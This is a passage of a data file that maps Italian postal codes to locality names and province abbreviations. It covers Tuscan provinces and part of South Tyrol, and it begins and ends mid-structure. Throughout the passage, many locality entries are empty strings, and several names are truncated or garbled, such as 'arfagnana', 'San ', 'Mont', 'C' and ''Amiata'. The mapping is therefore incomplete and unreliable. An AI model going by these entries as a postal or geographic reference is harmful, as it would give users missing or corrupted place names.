["Filare", "GR"], ], "58024": [ ["Montebamboli", "GR"], ["", "GR"], ["Prata", "GR"], ["Niccioleta", "GR"], ["Capanne", "GR"], ["", "GR"], ["Tatti", "GR"], ["Ghirlanda", "GR"], ["Valpiana", "GR"], ], "58025": [["", "GR"], ["", "GR"], ["Frassine", "GR"]], "58026": [["Travale", "GR"], ["Montieri", "GR"], ["Boccheggiano", "GR"], ["Gerfalco", "GR"]], "58027": [["Ribolla", "GR"], ["Montemassi", "GR"]], "58031": [ ["Bagnoli", "GR"], ["Arcidosso", "GR"], ["Salaiola", "GR"], ["Montelaterone", "GR"], ["Zancona", "GR"], ["Stribugliano", "GR"], ], "58033": [["Montegiovi", "GR"], ["", "GR"], ["Montenero", "GR"]], "58034": [["Castell'Azzara", "GR"], ["Selvena", "GR"]], "58036": [ ["", "GR"], ["Sassofortino", "GR"], ["Sticciano", "GR"], ["Roccatederighi", "GR"], ["Roccastrada", "GR"], ["Torniella", "GR"], ["", "GR"], ], "58037": [["Bagnolo", "GR"], ["Selva", "GR"], ["", "GR"], ["Marroneto", "GR"], ["Bagnore", "GR"]], "58038": [["Seggiano", "GR"]], "58042": [["Montorsaio", "GR"], ["Campagnatico", "GR"], ["Arcille", "GR"], ["Arcille Di Campagnatico", "GR"]], "58043": [ ["Buriano", "GR"], ["Vetulonia", "GR"], ["", "GR"], ["Tirli", "GR"], ["", "GR"], ["", "GR"], ], "58044": [ ["", "GR"], ["Cinigiano", "GR"], ["", "GR"], ["'Amiata", "GR"], ["", "GR"], ], "58045": [ ["Stazione Di Monte Antico", "GR"], ["Monte Antico Scalo", "GR"], ["Monte Antico", "GR"], ["Paganico", "GR"], ["Civitella Paganico", "GR"], ["Casale Di Pari", "GR"], ["Pari", "GR"], ["C", "GR"], ], "58051": [["Magcana", "GR"], ["Pereta", "GR"], ["Montiano", "GR"]], "58053": [ ["Cana", "GR"], ["Vallerona", "GR"], ["Roccalbegna", "GR"], ["Santa Caterina", "GR"], ["Triana", "GR"], ], "58054": [ ["Murci", "GR"], ["Pomonte", "GR"], ["Pancole", "GR"], ["Scansano", "GR"], ["Montorgiali", "GR"], ["", "GR"], ["Baccinello", "GR"], ["Polveraia", "GR"], ["Preselle", "GR"], ["Poggioferro", "GR"], ], "58055": [["Semproniano", "GR"], ["Petricci", "GR"], ["Catabbio", "GR"], ["Cellena", "GR"]], "58100": [ ["", "GR"], ["", "GR"], ["Rispescia", "GR"], ["Batignano", "GR"], ["Le Stiacciole", "GR"], ["Braccagni", "GR"], ["Montepescali Stazione", "GR"], ["", "GR"], ["", "GR"], ["Alberese", "GR"], ["Montepescali", "GR"], ["Grosseto", "GR"], ["", "GR"], ], 
"57014": [ ["Vicarello", "LI"], ["", "LI"], ["Castell'Anselmo", "LI"], ["Crocino", "LI"], ["", "LI"], ["Collesalvetti", "LI"], ["Colognole", "LI"], ["", "LI"], ], "57016": [ ["", "LI"], ["Nibbiaia", "LI"], ["", "LI"], ["Castiglioncello", "LI"], ["", "LI"], ["Gabbro", "LI"], ["Vada", "LI"], ["", "LI"], ], "57017": [["Stagno", "LI"], ["", "LI"], ["Nugola", "LI"], ["Guasticce", "LI"]], "57020": [["Sassetta", "LI"], ["La California", "LI"], ["Bibbona", "LI"]], "57021": [ ["Stazione Di Campiglia Marittima", "LI"], ["Campiglia Marittima Stazione", "LI"], ["", "LI"], ["Venturina", "LI"], ], "57022": [ ["Donoratico", "LI"], ["", "LI"], ["", "LI"], ["", "LI"], ["", "LI"], ["Bolgheri", "LI"], ], "57023": [["San Pietro In Palazzi", "LI"], ["Cecina", "LI"], ["", "LI"]], "57025": [ ["Piombino", "LI"], ["", "LI"], ["Colmata", "LI"], ["Portovecchio", "LI"], ["", "LI"], ["Riotorto", "LI"], ["Populonia", "LI"], ["Cotone", "LI"], ["", "LI"], ], "57027": [["", "LI"], ["", "LI"]], "57028": [["Montioni", "LI"], ["Suvereto", "LI"]], "57030": [["Procchio", "LI"], ["Poggio", "LI"], ["Marciana", "LI"], ["Pomonte", "LI"]], "57031": [["Capoliveri", "LI"]], "57032": [["", "LI"]], "57033": [["", "LI"]], "57034": [ ["", "LI"], ["Cavoli", "LI"], ["", "LI"], ["Pianosa", "LI"], ["", "LI"], ["Seccheto", "LI"], ["Sant'Ilario", "LI"], ["", "LI"], ["La Pila", "LI"], ], "57036": [["", "LI"]], "57037": [["Portoferraio", "LI"], ["Magazzini", "LI"], ["Carpani", "LI"], ["", "LI"]], "57038": [["", "LI"], ["Cavo", "LI"]], "57039": [["", "LI"]], "57100": [["Livorno", "LI"]], "57121": [["Livorno", "LI"]], "57122": [["Livorno", "LI"]], "57123": [["Livorno", "LI"]], "57124": [["Livorno", "LI"], ["Salviano", "LI"], ["", "LI"]], "57125": [["Livorno", "LI"]], "57126": [["Livorno", "LI"]], "57127": [["Livorno", "LI"]], "57128": [["Antignano", "LI"], ["Livorno", "LI"], ["Montenero", "LI"], ["Ardenza", "LI"]], "55010": [["", "LU"], ["Gragnano", "LU"], ["San Gennaro", "LU"], ["Lappato", "LU"]], "55011": [["Marginone", "LU"], ["Altopascio", "LU"], ["", "LU"], ["Spianate", "LU"]], "55012": [["Capannori", "LU"], ["Zone", "LU"], ["Lunata", "LU"], ["", "LU"]], "55013": [["Lammari", "LU"]], "55014": [["Marlia", "LU"]], "55015": [ ["San Salvatore", "LU"], ["San Salvatore Di Montecarlo", "LU"], ["Montecarlo", "LU"], ["Turchetto", "LU"], ], "55016": [["Porcari", "LU"]], "55018": [ ["Segromigno In Piano", "LU"], ["San Colombano", "LU"], ["Matraia", "LU"], ["Segromigno In Monte", "LU"], ], "55019": [["Pracando", "LU"], ["Botticino", "LU"], ["Villa Basilica", "LU"]], "55020": [ ["Fosciandora", "LU"], ["San Pellegrinetto", "LU"], ["Fornovolasco", "LU"], ["Vergemoli", "LU"], ["Sassi", "LU"], ["Molazzana", "LU"], ], "55021": [["", "LU"], ["", "LU"]], "55022": [ ["", "LU"], ["", "LU"], ["", "LU"], ["Scesta", "LU"], ["", "LU"], ["Montefegatesi", "LU"], ["", "LU"], ["", "LU"], ["Benabbio", "LU"], ["", "LU"], ["Lucchio", "LU"], ["Casabasciana", "LU"], ["Fornoli", "LU"], ["Isola", "LU"], ], "55023": [ ["Gioviano", "LU"], ["Diecimo", "LU"], ["Chifenti", "LU"], ["Anchiano", "LU"], ["Corsagna", "LU"], ["", "LU"], ["Valdottavo", "LU"], ], "55025": [ ["Tereglio", "LU"], ["Ghivizzano", "LU"], ["Calavorno", "LU"], ["", "LU"], ["", "LU"], ], "55027": [["Gallicano", "LU"], ["Fiattone", "LU"], ["Turritecava", "LU"], ["Trassilico", "LU"]], "55030": [ ["", "LU"], ["", "LU"], ["Careggine", "LU"], ["Corfino", "LU"], ["", "LU"], ["Magliano", "LU"], ], "55031": [["Poggio", "LU"], ["", "LU"], ["Camporgiano", "LU"], ["Filicaia", "LU"]], "55032": [["Palleroso", "LU"], ["", "LU"]], 
"55033": [ ["Chiozza", "LU"], ["", "LU"], ["Valbona", "LU"], ["Cerageto", "LU"], ["", "LU"], ], "55034": [ ["Gramolazzo", "LU"], ["Minucciano", "LU"], ["Gorfigliano", "LU"], ["Carpinelli", "LU"], ["", "LU"], ["", "LU"], ], "55035": [["Sant'Anastasio", "LU"], ["", "LU"], ["", "LU"]], "55036": [["", "LU"]], "55038": [["arfagnana", "LU"]], "55039": [["Giuncugnano", "LU"], ["", "LU"], ["Sillano", "LU"]], "55040": [["Stazzema", "LU"], ["Ruosina", "LU"], ["Pontestazzemese", "LU"], ["Terrinca", "LU"]], "55041": [ ["Nocchi", "LU"], ["Pieve", "LU"], ["Camaiore", "LU"], ["Vado", "LU"], ["Valpromaro", "LU"], ["", "LU"], ["", "LU"], ["Montebello", "LU"], ["Pedona", "LU"], ["Montemagno", "LU"], ["Casoli", "LU"], ], "55042": [["", "LU"]], "55045": [ ["Fiumetto", "LU"], ["Pietrasanta", "LU"], ["Focette", "LU"], ["", "LU"], ["Capriglia", "LU"], ["", "LU"], ["Crociale", "LU"], ["", "LU"], ["Capezzano", "LU"], ["Vallecchia", "LU"], ["Strettoia", "LU"], ["Tonfano", "LU"], ], "55047": [ ["Pozzi", "LU"], ["Riomagno", "LU"], ["Querceta", "LU"], ["Seravezza", "LU"], ["Ripa", "LU"], ["Ponterosso", "LU"], ["Basati", "LU"], ["Azzano", "LU"], ], "55049": [["Viareggio", "LU"], ["", "LU"]], "55051": [ ["Filecchio", "LU"], ["Sommocolonia", "LU"], ["", "LU"], ["Barga", "LU"], ["", "LU"], ["", "LU"], ["Tiglio", "LU"], ["Mologno", "LU"], ["Sommacolonia", "LU"], ], "55054": [ ["", "LU"], ["Corsanico", "LU"], ["Bozzano", "LU"], ["Quiesa", "LU"], ["", "LU"], ["Stiava", "LU"], ["Massarosa", "LU"], ["", "LU"], ["Gualdo", "LU"], ], "55060": [ ["Palagnana", "LU"], ["Guamo", "LU"], ["Vorno", "LU"], ["", "LU"], ["", "LU"], ], "55061": [["Carraia", "LU"], ["", "LU"]], "55062": [["Ruota", "LU"], ["", "LU"], ["", "LU"]], "55064": [ ["Pascoso", "LU"], ["", "LU"], [" In Freddana", "LU"], ["Loppeglia", "LU"], ["", "LU"], ["Piegaio", "LU"], ["San Rocco In Turrite", "LU"], ["Pescaglia", "LU"], ], "55100": [ ["", "LU"], ["Lucca", "LU"], ["Cerasomma", "LU"], ["", "LU"], ["", "LU"], ["Pontetetto", "LU"], ["", "LU"], ["Piaggione", "LU"], ["Saltocchio", "LU"], ["Nozzano", "LU"], ["", "LU"], ["", "LU"], ["Fagnano", "LU"], ["Montuolo", "LU"], ["Maggiano", "LU"], ["", "LU"], ["Picciorana", "LU"], ["Vinchiana", "LU"], ["Mutigliano", "LU"], ["Gattaiola", "LU"], ["", "LU"], ["", "LU"], ], "54010": [["Montedivalli", "MS"], ["Podenzana", "MS"]], "54011": [ ["Quercia", "MS"], ["Pallerone", "MS"], ["Bigliolo", "MS"], ["Caprigliola", "MS"], ["Aulla", "MS"], ["Bibola", "MS"], ["Serricciolo", "MS"], ["", "MS"], ], "54012": [["Barbarasco", "MS"], ["Tresana", "MS"], ["", "MS"]], "54013": [ ["Campiglione", "MS"], ["Sassalbo", "MS"], ["Tenerano", "MS"], ["Soliera", "MS"], ["Moncigoli", "MS"], ["Vinca", "MS"], ["Fivizzano", "MS"], ["", "MS"], ["Agnino", "MS"], ["", "MS"], ["Gragnola", "MS"], ["Gassano", "MS"], ["Colla", "MS"], ["Rometta", "MS"], ["Ceserano", "MS"], ["Monzone", "MS"], ["", "MS"], ], "54014": [ ["Regnano", "MS"], ["Codiponte", "MS"], ["", "MS"], ["Equi", "MS"], ["", "MS"], ], "54015": [["Comano", "MS"], ["Crespiano", "MS"]], "54016": [ ["", "MS"], ["", "MS"], ["Tavernelle", "MS"], ["Monti", "MS"], ["Terrarossa", "MS"], ], "54021": [["Treschietto", "MS"], ["Gabbiana", "MS"], ["Bagnone", "MS"], ["Corlaga", "MS"]], "54023": [["Filattiera", "MS"], ["Cantiere", "MS"], ["Ponticello", "MS"], ["Scorcetoli", "MS"]], "54026": [ ["", "MS"], ["Montereggio", "MS"], ["Groppoli", "MS"], ["Arpiola", "MS"], ["Mulazzo", "MS"], ], "54027": [ ["Traverde", "MS"], ["Molinello", "MS"], ["Pontremoli", "MS"], ["Grondola", "MS"], ["Guinadi", "MS"], ["Cervara", "MS"], 
["Vignola", "MS"], ], "54028": [["Filetto", "MS"], ["Villafranca In Lunigiana", "MS"], ["Virgoletta", "MS"], ["Merizzo", "MS"]], "54029": [["Zeri", "MS"], ["", "MS"]], "54033": [ ["Castelpoggio", "MS"], ["Fossone", "MS"], ["Fossola", "MS"], ["", "MS"], ["Avenza", "MS"], ["Codena", "MS"], ["Gragnana", "MS"], ["Sorgnano", "MS"], ["Carrara", "MS"], ["Torano", "MS"], ["Bergiola", "MS"], ["Fontia", "MS"], ["Miseglia", "MS"], ["Bedizzano", "MS"], ["Colonnata", "MS"], ], "54035": [ ["Tendola", "MS"], ["Fosdinovo", "MS"], ["Caniparola", "MS"], ["Borghetto", "MS"], ["Melara", "MS"], ["Marciaso", "MS"], ], "54038": [ ["", "MS"], ["Cerreto", "MS"], ["", "MS"], ["Cinquale", "MS"], ["Montignoso", "MS"], ], "54100": [ ["Turano", "MS"], ["Ronchi", "MS"], ["Forno", "MS"], ["Casette", "MS"], ["Mirteto", "MS"], ["Canevara", "MS"], ["Altagnana", "MS"], ["Massa", "MS"], ["Quercioli", "MS"], ["", "MS"], ], "56010": [ ["", "PI"], ["", "PI"], ["Campo", "PI"], ["Caprona", "PI"], ["Cucigliana", "PI"], ["", "PI"], ["Mezzana", "PI"], ["Vicopisano", "PI"], ], "56011": [["Gabella", "PI"], ["Castelmaggiore", "PI"], ["Calci", "PI"], ["Montemagno", "PI"]], "56012": [["Calcinaia", "PI"], ["Fornacette", "PI"]], "56017": [ ["Gello", "PI"], ["Ripafratta", "PI"], ["Agnano", "PI"], ["", "PI"], ["Pontasserchio", "PI"], ["Arena", "PI"], ["", "PI"], ["Rigoli", "PI"], ["Ghezzano", "PI"], ["Asciano", "PI"], ["Pappiana", "PI"], ], "56019": [["Vecchiano", "PI"], ["Avane", "PI"], ["Filettole", "PI"], ["Migliarino", "PI"], ["Nodica", "PI"]], "56020": [ ["Cerretti", "PI"], ["Montecalvoli", "PI"], ["", "PI"], ["", "PI"], ["Montopoli", "PI"], ["'Arno", "PI"], ["Marti", "PI"], ["", "PI"], ["Capanne", "PI"], ], "56021": [ ["Cascina", "PI"], ["", "PI"], ["Marciana", "PI"], ["", "PI"], ["", "PI"], ["San ", "PI"], ["Latignano", "PI"], ], "56022": [["", "PI"], ["", "PI"], ["Orentano", "PI"]], "56023": [ ["Navacchio", "PI"], ["", "PI"], ["Montione", "PI"], ["Musigliano", "PI"], ["Ripoli", "PI"], ], "56024": [["Corazzano", "PI"], ["La Serra", "PI"], ["", "PI"]], "56025": [ ["Montecastello", "PI"], ["Pontedera", "PI"], ["La Borra", "PI"], ["Il Romito", "PI"], ["Treggiaia", "PI"], ["La Rotta", "PI"], ["", "PI"], ], "56028": [ ["Isola", "PI"], ["", "PI"], ["San Mini", "PI"], ["San Miniato", "PI"], ["P", "PI"], ], "56029": [["Staffoli", "PI"], ["", "PI"]], "56030": [ ["Selvatelle", "PI"], ["Orciatico", "PI"], ["Soiana", "PI"], ["Terricciola", "PI"], ["Morrona", "PI"], ["Lajatico", "PI"], ], "56031": [["Bientina", "PI"], ["", "PI"]], "56032": [["La Croce", "PI"], ["Buti", "PI"], ["Cascine", "PI"]], "56033": [["San Pietro Belvedere", "PI"], ["Capannoli", "PI"]], "56034": [["Rivalto", "PI"], ["", "PI"], ["Chianni", "PI"]], "56035": [ ["Usigliano", "PI"], ["Cevoli", "PI"], ["Lavaiano", "PI"], ["", "PI"], ["Perignano", "PI"], ["", "PI"], ["", "PI"], ["Lari", "PI"], ["Spinelli", "PI"], ], "56036": [ ["Montefoscoli", "PI"], ["Palaia", "PI"], ["", "PI"], ["Alica", "PI"], ["Forcoli", "PI"], ["Partino", "PI"], ], "56037": [ ["Fabbrica", "PI"], ["", "PI"], ["", "PI"], ["Ghizzano", "PI"], ["Peccioli", "PI"], ["Legoli", "PI"], ], "56038": [["Giardino", "PI"], ["Ponsacco", "PI"]], "56040": [ ["", "PI"], ["Guardistallo", "PI"], ["", "PI"], ["Montescudaio", "PI"], ["", "PI"], ["Cenaia", "PI"], ["", "PI"], ["Sassa", "PI"], ["", "PI"], ["", "PI"], ["", "PI"], ["Canneto", "PI"], ["", "PI"], ["Ponteginori", "PI"], ["", "PI"], ["Crespina", "PI"], ["", "PI"], ["Pastina", "PI"], ["Pomaia", "PI"], ["", "PI"], ], "56041": [["", "PI"], ["", "PI"], ["", "PI"]], "56042": [["", 
"PI"], ["Lorenzana", "PI"]], "56043": [["Luciana", "PI"], ["Fauglia", "PI"]], "56044": [["Lustignano", "PI"], ["Larderello", "PI"], ["Serrazzano", "PI"], ["Montecerboli", "PI"]], "56045": [ ["", "PI"], ["Montegemoli", "PI"], ["Micciano", "PI"], ["Libbiano", "PI"], ["Pomarance", "PI"], ], "56046": [["Riparbella", "PI"]], "56048": [ ["Volterra", "PI"], ["Pignano", "PI"], ["Mazzolla", "PI"], ["Villamagna", "PI"], ["Ulignano", "PI"], ["", "PI"], ["Saline", "PI"], ], "56100": [["Pisa", "PI"]], "56121": [["Putignano", "PI"], ["Pisa", "PI"], ["Riglione", "PI"], ["Coltano", "PI"]], "56122": [["", "PI"], ["Pisa", "PI"]], "56123": [["Pisa", "PI"]], "56124": [["Pisa", "PI"]], "56125": [["Pisa", "PI"]], "56126": [["Pisa", "PI"]], "56127": [["Pisa", "PI"]], "56128": [["Pisa", "PI"]], "59011": [["Seano", "PO"], ["Bacchereto", "PO"]], "59013": [["Fornacelle", "PO"], ["Montemurlo", "PO"], ["Oste", "PO"]], "59015": [ ["", "PO"], ["Artimino", "PO"], ["", "PO"], ["Carmignano", "PO"], ["Comeana", "PO"], ], "59016": [["", "PO"], ["Poggetto", "PO"]], "59021": [["", "PO"], ["Vaiano", "PO"], ["Schignano", "PO"]], "59024": [ ["", "PO"], ["Mercatale", "PO"], ["Cavarzano", "PO"], ["", "PO"], ["San Quirico", "PO"], ["Vernio", "PO"], ], "59025": [ ["", "PO"], ["Cantagallo", "PO"], ["Carmignanello", "PO"], ["Usella", "PO"], ["Luicciana", "PO"], ], "59026": [["Montepiano", "PO"]], "59100": [ ["Cafaggio", "PO"], ["Galciana", "PO"], ["", "PO"], ["", "PO"], ["Mezzana", "PO"], ["Narnali", "PO"], ["Santa Maria A Colonica", "PO"], ["Iolo", "PO"], ["Viaccia", "PO"], ["San Giorgio A Colonica", "PO"], ["Paperino", "PO"], ["Prato", "PO"], ["Maliseti", "PO"], ["Coiano", "PO"], ["", "PO"], ["Tavola", "PO"], ], "51010": [ ["Traversagna", "PT"], ["Marliana", "PT"], ["Montagnana", "PT"], ["Santa Lucia Uzzanese", "PT"], ["Forone", "PT"], ["Avaglio", "PT"], ["", "PT"], ["", "PT"], ["", "PT"], ["Uzzano", "PT"], ["", "PT"], ["Momigno", "PT"], ["", "PT"], ], "51011": [["Buggiano", "PT"], ["", "PT"]], "51012": [["Veneri", "PT"], ["", "PT"], ["", "PT"], ["Collodi", "PT"]], "51013": [["", "PT"], ["Chiesanuova", "PT"], ["Chiesanuova Uzzanese", "PT"]], "51015": [ ["Cintolese", "PT"], ["Montevettolini", "PT"], ["Pozzarello", "PT"], ["", "PT"], ["", "PT"], ["Uggia", "PT"], ["Pazzera", "PT"], ], "51016": [ ["Nievole", "PT"], ["", "PT"], ["", "PT"], ["", "PT"], ], "51017": [ ["", "PT"], ["Pietrabuona", "PT"], ["Pescia", "PT"], ["Castelvecchio", "PT"], ["Vellano", "PT"], ["", "PT"], ["", "PT"], ["Pontito", "PT"], ], "51018": [["", "PT"]], "51019": [["", "PT"], ["Anchione", "PT"]], "51020": [ ["Castello", "PT"], ["Prunetta", "PT"], ["Popiglio", "PT"], ["Calamecca", "PT"], ["Pavana", "PT"], ["", "PT"], ["Treppio", "PT"], ["", "PT"], ["", "PT"], ["Prataccio", "PT"], ["Torri", "PT"], ["Collina", "PT"], ["Crespole", "PT"], ["Frassignoni", "PT"], ["Piteglio", "PT"], ["", "PT"], ["", "PT"], ], "51021": [["Abetone", "PT"], ["Le Regine", "PT"]], "51024": [["Pianosinatico", "PT"], ["", "PT"], ["Cutigliano", "PT"]], "51028": [ ["", "PT"], ["Pontepetri", "PT"], ["Gavinana", "PT"], ["", "PT"], ["Bardalone", "PT"], ["", "PT"], ["Mammiano", "PT"], ["Maresca", "PT"], ["", "PT"], ["Limestre", "PT"], ], "51030": [["", "PT"]], "51031": [["", "PT"], ["Agliana", "PT"], ["", "PT"]], "51034": [ ["", "PT"], ["", "PT"], ["", "PT"], ["Casalguidi", "PT"], ], "51035": [ ["", "PT"], ["Lamporecchio", "PT"], ["Porciano", "PT"], ["Mastromarco", "PT"], ["Orbignano", "PT"], ], "51036": [["", "PT"], ["Larciano", "PT"], ["Castelmartini", "PT"]], "51037": [ ["", "PT"], ["Fognano", 
"PT"], ["Montale", "PT"], ["", "PT"], ["Tobbiana", "PT"], ], "51039": [ ["Catena", "PT"], ["Olmi", "PT"], ["Santonuovo", "PT"], ["Quarrata", "PT"], ["Montemagno", "PT"], ["Ferruccia", "PT"], ["Tizzana", "PT"], ["", "PT"], ], "51100": [ ["Candeglia", "PT"], ["Capostrada", "PT"], ["Saturnana", "PT"], ["Ponzano", "PT"], ["Orsigna", "PT"], ["Pontelungo", "PT"], ["Piazza", "PT"], ["", "PT"], ["Piastre", "PT"], ["Masiano", "PT"], ["Chiazzano", "PT"], ["", "PT"], ["Valdibrana", "PT"], ["Grazie", "PT"], ["Piteccio", "PT"], ["Pistoia", "PT"], ["", "PT"], ["", "PT"], ["Pracchia", "PT"], ["Corbezzi", "PT"], ["Bottegone", "PT"], ["Cireglio", "PT"], ["Sammomme'", "PT"], ["Santomato", "PT"], ], "53011": [["Fonterutoli", "SI"], ["Castellina In Chianti", "SI"]], "53012": [["Chiusdino", "SI"], ["Ciciano", "SI"], ["Frosini", "SI"], ["Montalcinello", "SI"]], "53013": [ ["Lecchi", "SI"], ["Nusenna", "SI"], ["Castagnoli", "SI"], ["Monti", "SI"], ["Ama", "SI"], ["", "SI"], ], "53014": [ ["", "SI"], ["", "SI"], ["", "SI"], ["Corsano", "SI"], ["", "SI"], ["", "SI"], ], "53015": [ ["Iesa", "SI"], ["", "SI"], ["Monticiano", "SI"], ["Scalvaia", "SI"], ["Tocchi", "SI"], ], "53016": [["Casciano", "SI"], ["Murlo", "SI"], ["Vescovado", "SI"]], "53017": [["Lucarelli", "SI"], ["", "SI"]], "53018": [["Rosia", "SI"], ["Sovicille", "SI"], ["", "SI"]], "53019": [ ["Vagliagli", "SI"], ["Casetta", "SI"], ["Quercegrossa", "SI"], ["", "SI"], ["", "SI"], ["Pianella", "SI"], ["Monteaperti", "SI"], ["'", "SI"], ], "53020": [ ["Montisi", "SI"], ["Trequanda", "SI"], ["Castelmuzio", "SI"], ["Petroio", "SI"], ["", "SI"], ], "53021": [["", "SI"]], "53022": [["Buonconvento", "SI"]], "53023": [ ["", "SI"], ["Gallina", "SI"], ["", "SI"], ["", "SI"], ["", "SI"], ["", "SI"], ], "53024": [ ["Montalcino", "SI"], ["", "SI"], ["", "SI"], ["Torrenieri", "SI"], ["", "SI"], ], "53025": [["Saragiolo", "SI"], ["Piancastagnaio", "SI"]], "53026": [["Monticchiello", "SI"], ["Pienza", "SI"]], "53027": [["", "SI"], ["", "SI"]], "53030": [ ["Belforte", "SI"], ["Anqua", "SI"], ["", "SI"], ["", "SI"], ["Radicondoli", "SI"], ], "53031": [["Monteguidi", "SI"], ["Pievescola", "SI"], ["", "SI"]], "53034": [ ["Quartaia", "SI"], ["", "SI"], ["", "SI"], ["Campiglia", "SI"], ], "53035": [ ["", "SI"], ["", "SI"], ["Uopini", "SI"], ["Monteriggioni", "SI"], ["Belverde", "SI"], ["Castellina In Chianti Stazione", "SI"], ["Badesse", "SI"], ["Strove", "SI"], ["Tognazza", "SI"], ], "53036": [["Poggibonsi", "SI"], ["Bellavista", "SI"], ["Staggia", "SI"]], "53037": [["Ulignano", "SI"], ["", "SI"], ["San Gimignano", "SI"]], "53040": [ ["", "SI"], ["Contignano", "SI"], ["Radicofani", "SI"], ["Cetona", "SI"], ["", "SI"], ["", "SI"], ["Palazzone", "SI"], ["", "SI"], ["Piazze", "SI"], ], "53041": [ ["Chiusure", "SI"], ["Arbia", "SI"], ["Asciano", "SI"], ["Mont", "SI"], ["", "SI"], ], "53042": [["", "SI"]], "53043": [["Chiusi Stazione", "SI"], ["Chiusi", "SI"], ["Montallese", "SI"], ["Chiusi Scalo", "SI"]], "53045": [ ["Mont", "SI"], ["Abbadia", "SI"], ["Valiano", "SI"], ["Acquaviva", "SI"], ["", "SI"], ["Gracciano", "SI"], ["Montepulciano", "SI"], ["Sant'Albino", "SI"], ], "53047": [["Sarteano", "SI"]], "53048": [ ["Rigomagno", "SI"], ["Guazzino", "SI"], ["", "SI"], ["Rigaiolo", "SI"], ["Bettolle", "SI"], ["Sinalunga", "SI"], ["Scrofiano", "SI"], ], "53049": [["Montefollonico", "SI"], ["Torrita Stazione", "SI"], ["Torrita Di Siena", "SI"]], "53100": [ ["Costalpino", "SI"], ["", "SI"], ["Siena", "SI"], ["", "SI"], ["Coroncina", "SI"], ["", "SI"], ["Malafrasca", "SI"], ["", "SI"], ], 
"39010": [ ["Grissian", "BZ"], ["Saltusio", "BZ"], ["Tisens", "BZ"], ["Tesimo", "BZ"], [".", "BZ"], ["Sinich", "BZ"], ["Nals", "BZ"], ["Pawigl", "BZ"], ["Nalles", "BZ"], ["Sigmundskron", "BZ"], ["Gfrill", "BZ"], ["Platzers", "BZ"], ["St. Nikolaus/Ulten", "BZ"], ["Vilpian", "BZ"], ["Vernue", "BZ"], ["Gfeis", "BZ"], ["Schlaneid", "BZ"], ["Pfelders", "BZ"], ["Saltaus", "BZ"], ["Verschneid", "BZ"], ["Kuens", "BZ"], ["", "BZ"], ["", "BZ"], ["Riffian", "BZ"], ["Caines", "BZ"], ["", "BZ"], ["", "BZ"], ["", "BZ"], ["Cermes", "BZ"], ["Senale San Felice", "BZ"], ["San Martino In Passiria", "BZ"], ["Andrian", "BZ"], ["", "BZ"], ["Frangart", "BZ"], ["Prissia", "BZ"], ["", "BZ"], ["Mölten", "BZ"], ["", "BZ"], ["", "BZ"], ["Meltina", "BZ"], ["Vöran", "BZ"], ["Hafling", "BZ"], ["Tscherms", "BZ"], ["Avelengo", "BZ"], ["Senale", "BZ"], ["Sant'Orsola In Passiria", "BZ"], ["Rifiano", "BZ"], ["Andriano", "BZ"], ["Gargazon", "BZ"], ["Prissiano", "BZ"], ["Gargazzone", "BZ"], ["Walten", "BZ"], ["Verano", "BZ"], ], "39011": [ ["Lana", "BZ"], ["Pawig", "BZ"], ["Vigiljoc", "BZ"], ["Völlan", "BZ"], ["Pavicolo", "BZ"], ["", "BZ"], ], "39012": [ ["", "BZ"], ["Sinic", "BZ"], ["Sinigo", "BZ"], ["Obermais", "BZ"], ["Gratsch", "BZ"], ["", "BZ"], ["Untermais", "BZ"], ["Meran", "BZ"], ["Merano", "BZ"], ], "39013": [ ["Moos", "BZ"], ["Moso In Passiria", "BZ"], ["Stuls", "BZ"], ["Plan In Passiria", "BZ"], ["Platt", "BZ"], ["Pfelder", "BZ"], ["Rabenstein", "BZ"], ["Ulfas", "BZ"], ], "39014": [["Postal", "BZ"], ["Burgstall", "BZ"]], "39015": [ ["Walte", "BZ"], ["San Leonardo In Passiria", "BZ"], ["St. Leonhard in Pass.", "BZ"], ["Schweinsteg", "BZ"], ["Valtina", "BZ"], ["Sant'Orsola", "BZ"], ["Windegg", "BZ"], ], "39016": [ ["St. Moritz/Ulten", "BZ"], ["Kuppelwies", "BZ"], ["St.Nikolau", "BZ"], ["Santa Valburga Ultimo", "BZ"], ["Ultimo", "BZ"], ["St.Walburg Ulte", "BZ"], ["Santa Geltrude In Ultimo", "BZ"], ["San Nicolo' Ultimo", "BZ"], ["San Nicolo'", "BZ"], ["Santa Valburga", "BZ"], ["St. Walburg/Ulten", "BZ"], ["Santa Gertrude", "BZ"], ], "39017": [["Verdins", "BZ"], ["Videgg", "BZ"], ["Schenna", "BZ"], ["Tall", "BZ"], ["Scena", "BZ"]], "39018": [ ["Vilpiano", "BZ"], ["Siebeneich", "BZ"], ["Vilpia", "BZ"], ["Terlan", "BZ"], ["Terlano", "BZ"], ["Settequerce", "BZ"], ], "39019": [["Tirolo", "BZ"], ["Tirol", "BZ"]], "39020": [ ["Tanas", "BZ"], ["Vernagt", "BZ"], ["Gand/Martell", "BZ"], ["Lichtenberg", "BZ"], ["Schluderns", "BZ"], ["Karthaus", "BZ"], ["Eyrs", "BZ"], ["Staben", "BZ"], ["", "BZ"], ["Plawenn", "BZ"], ["Melag", "BZ"], ["Planeil", "BZ"], ["St. 
.", "BZ"], ["Laatsch", "BZ"], ["Graun/Vinschg.", "BZ"], ["Matsch", "BZ"], ["Unsere ", "BZ"], ["Freiberg", "BZ"], ["Marein", "BZ"], ["Töll", "BZ"], ["Tartsch", "BZ"], ["Tabland", "BZ"], ["Marlengo", "BZ"], ["Marling", "BZ"], ["Tschengls", "BZ"], ["Glurns", "BZ"], ["Goldrain", "BZ"], ["Pedroß", "BZ"], ["", "BZ"], ["Tschars", "BZ"], ["Katharinaberg", "BZ"], ["Kastelbell", "BZ"], ["", "BZ"], ["Tol", "BZ"], ["", "BZ"], ["", "BZ"], ["Tarsch", "BZ"], ["Gries", "BZ"], ["Ciardes", "BZ"], ["Tubre", "BZ"], ["Sluderno", "BZ"], ["", "BZ"], ["Gomagoi", "BZ"], ["Glorenza", "BZ"], ["Parcines", "BZ"], ["Partschins", "BZ"], ["Senales", "BZ"], ["Tel", "BZ"], ["Montefranco", "BZ"], ["Rabland", "BZ"], ["Rabla'", "BZ"], ["Madonna", "BZ"], ["Trafoi", "BZ"], ["Castelbello", "BZ"], ["Martello", "BZ"], ["Hinterkirch", "BZ"], ["Morter", "BZ"], ["Stilfs", "BZ"], ["Rifair", "BZ"], ["Martell", "BZ"], ], "39021": [ ["Laces", "BZ"], ["Latsch", "BZ"], ["Morter", "BZ"], ["Morte", "BZ"], ["Goldrai", "BZ"], ["Tarsc", "BZ"], ["St. Kofl", "BZ"], ["Coldrano", "BZ"], ["Tarres", "BZ"], ], "39022": [ ["Oberplars", "BZ"], ["Vellau", "BZ"], 